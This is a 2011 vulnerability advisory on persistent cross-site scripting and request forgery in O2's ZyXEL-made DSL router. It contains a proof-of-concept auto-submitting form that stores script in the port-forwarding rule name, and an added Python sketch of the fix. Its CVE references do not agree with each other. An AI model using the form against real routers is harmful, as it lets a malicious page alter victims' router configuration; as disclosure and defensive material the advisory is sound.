O2 classic router: persistent cross site scripting (XSS) and cross site request forgery (CSRF)

2011.04.14
Credit: Hanno Boeck
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1482
http://int21.de/cve/CVE-2011-0746-o2-router.html

Description

The default DSL router shipped by the German company O2 is completely vulnerable to persistent cross site scripting (XSS) and cross site request forgery (CSRF). The device is produced by ZyXEL; it seems to have no other name than the brand "O2 DSL Router Classic".

As an example, the form at /Forms/PortForwarding_Edit_1 accepts JavaScript code for the parameter PortRule_Name, which will be permanently stored. Also, the form has no protection against CSRF.

Sample code that will inject permanent JavaScript when called by a user who is logged into his router:

    <form id="form1" method="post" action="http://192.168.1.1/Forms/PortForwarding_Edit_1">
    <input name="PortRule_Name" value='"><script>alert(7)</script>'>
    <input name="PortRule_SPort" value="77">
    <input name="PortRule_EPort" value="77">
    <input name="PortRule_SrvAddr" value="10.0.0.1" >
    <script>
    var frm = document.getElementById("form1");
    frm.submit();
    </script>

This is just an example; all forms in the router interface are vulnerable to CSRF and, if they accept text input, to XSS.

The vulnerability has been disclosed to O2 in advance without any reply.

Disclosure Timeline

2011-02-03: Vendor contacted
2011-04-07: Published advisory

This vulnerability was discovered by Hanno Boeck, http://www.hboeck.de, of schokokeks.org webhosting.
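The three server-side controls whose absence the advisory describes (a CSRF token, input validation, and output encoding), sketched as an added example that is not part of the original advisory or the router's firmware. The handler name, the csrf_token field, the session identifier and the allowlist pattern are assumptions; only the PortRule_* parameter names come from the advisory.

```python
import hashlib
import hmac
import html
import ipaddress
import re
import secrets

# Hypothetical per-device secret and allowlist; not taken from the router firmware.
SERVER_KEY = secrets.token_bytes(32)
NAME_RE = re.compile(r"[A-Za-z0-9 _.-]{1,32}")


def csrf_token(session_id: str) -> str:
    """Token bound to the admin session, embedded as a hidden field in each form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_port_forwarding_edit(session_id: str, form: dict, rules: list):
    """Process a POST to the port-forwarding form; returns (status, message)."""
    # 1. CSRF: a page on another origin cannot read the token, so cannot send it.
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, csrf_token(session_id).encode()):
        return 403, "missing or invalid CSRF token"
    # 2. Input validation: refuse markup before anything is stored.
    name = form.get("PortRule_Name", "")
    if not NAME_RE.fullmatch(name):
        return 400, "invalid rule name"
    try:
        sport, eport = int(form["PortRule_SPort"]), int(form["PortRule_EPort"])
        addr = str(ipaddress.ip_address(form["PortRule_SrvAddr"]))
    except (KeyError, ValueError):
        return 400, "invalid port or address"
    if not 1 <= sport <= eport <= 65535:
        return 400, "invalid port range"
    rules.append({"name": name, "sport": sport, "eport": eport, "addr": addr})
    return 200, "rule stored"


def render_rule_row(rule: dict) -> str:
    """3. Output encoding: escape on render, independent of input validation."""
    return "<tr><td>{}</td><td>{}-{}</td><td>{}</td></tr>".format(
        html.escape(rule["name"], quote=True), rule["sport"], rule["eport"],
        html.escape(rule["addr"], quote=True))
```

Escaping at render time matters even with the allowlist in place, because values stored before the fix would otherwise still execute.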

References:

http://www.securityfocus.com/archive/1/archive/1/517399/100/0/threaded
http://int21.de/cve/CVE-2011-0746-o2-router.html

